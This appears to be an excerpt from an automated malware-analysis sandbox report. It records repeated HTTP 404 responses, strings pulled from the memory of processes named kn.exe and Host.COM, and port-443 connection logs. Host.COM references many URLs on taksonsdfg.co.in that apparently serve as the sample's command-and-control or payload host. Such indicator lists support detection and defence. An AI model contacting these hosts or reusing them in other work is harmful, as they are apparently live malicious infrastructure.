      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:18 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:19 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:20 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:21 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:22 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:23 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:25 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:26 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:27 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:28 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:29 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:30 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:31 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:32 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:33 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:34 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:36 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:37 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:38 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:39 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:40 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:41 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:42 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:44 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:45 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:46 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:47 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:48 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:49 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:51 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:52 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:53 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:54 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:55 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:56 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 14 Oct 2024 02:30:57 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
      Source: kn.exe String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
      Source: Host.COM, Host.COM, 00000009.00000002.3035851816.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1800405801.0000000002892000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3054244908.000000007FA30000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3034224686.0000000002899000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1801015000.000000007F8EF000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
      Source: kn.exe String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
      Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
      Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
      Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
      Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
      Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
      Source: kn.exe, 00000006.00000000.1776491756.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1784579470.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1787962388.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1794360108.00007FF7E08AE000.00000002.00000001.01000000.00000005.sdmp String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
      Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
      Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/
      Source: Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/./
      Source: Host.COM, 00000009.00000002.3052727983.000000002501D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/25
      Source: Host.COM, 00000009.00000003.2455294317.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.000000000088D000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000002.3052727983.0000000025000000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx
      Source: Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx&/
      Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx/;
      Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1865183641.00000000008A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxB8
      Source: Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxN/c$
      Source: Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxV
      Source: Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_ZnrgbbhcbyxV/K$
      Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxo/
      Source: Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyxv/
      Source: Host.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx~
      Source: Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/6/
      Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/H
      Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/Z
      Source: Host.COM, 00000009.00000002.3032889978.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2643538771.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2667836018.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2655006782.00000000008AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/f/
      Source: Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/n/C$
      Source: Host.COM, 00000009.00000003.1865183641.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2455294317.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1832111190.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.1935087068.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2621473142.00000000008AA000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 00000009.00000003.2564991839.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/x
      Source: Host.COM, 00000009.00000003.1923031357.00000000008AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in/~
      Source: Host.COM, 00000009.00000002.3032889978.00000000008A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://taksonsdfg.co.in:443/34243456dfgd/255_Znrgbbhcbyx;
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
      Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50185 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50175
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
      Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50181
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50183
      Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50186
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50185
      Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50187
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
      Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50183 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50193
      Source: unknownNetwork traffic detected: HTTP traffic on port 50159 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
      Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50204 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50199
